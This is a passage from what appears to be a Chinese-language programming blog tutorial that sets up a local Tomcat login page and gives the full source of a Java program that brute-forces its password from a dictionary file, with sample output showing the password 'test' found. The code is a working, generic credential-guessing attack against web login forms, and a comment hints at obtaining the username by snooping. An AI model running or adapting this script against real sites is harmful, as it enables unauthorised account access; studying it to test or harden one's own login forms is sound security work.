二、运行Tomcat 5.5,启动其中的web站点:http://127.0.0.1:8080/password/
站点文件请下载。主要有三个,index.html(含有登录表单),check.jsp(表单验证),ok.jsp,error.jsp
三、在命令行运行探密程序,下面是运行结果:
C:\java>javac TestPassword.java
C:\java>java TestPassword
Try......646445
Try......53453553
Try......88887777
Try......44455
Try......test
OK! password=test
C:\java>
四、源码
1、TestPassword.java
import java.net.*; import java.io.*; import java.util.*; public class TestPassword{ public static void main(String[] args){ //猜口令用的字典 String filename="english.txt"; String currentPassword=null; boolean success=false; //服务器验证口令正确后的URL,当然要预先弄清楚 String successURL="http://localhost:8080/password/ok.jsp"; //服务器验证口令失败后的URL,当然要预先弄清楚 String failURL="http://localhost:8080/password/error.jsp"; String returnURL=null; try{ BufferedReader fileReader=new BufferedReader(new FileReader(filename)); //验证表单的JSP页面的URL,当然要预先弄清楚 URL url = new URL("http://localhost:8080/password/check.jsp"); while((currentPassword=fileReader.readLine())!=null){ URLConnection connection = url.openConnection(); connection.setDoOutput(true); connection.connect(); OutputStreamWriter out = new OutputStreamWriter(connection.getOutputStream(), "8859_1"); //username与password是表单验证程序所需要的参数,从登录表单中获取,至于用户名"cwb" //那要看你的"偷窥"的水平。 String formdata="username=cwb&password="+currentPassword; System.out.println("Try......"+currentPassword); out.write(formdata); out.flush(); InputStream in=connection.getInputStream(); returnURL=connection.getURL().toString(); //System.out.println(returnURL); if(returnURL.indexOf(successURL)!=-1){ System.out.println("OK! password="+currentPassword); success=true; break; } } if(!success) System.out.println("geuss password failed"); }catch(MalformedURLException e){ System.out.println("Must enter a valid URL"); }catch(IOException e){ System.out.println("Can't connect"); } } }
↑返回目录
前一篇: jdk1.5中的元数据一例
后一篇: 网页表单密码破解程序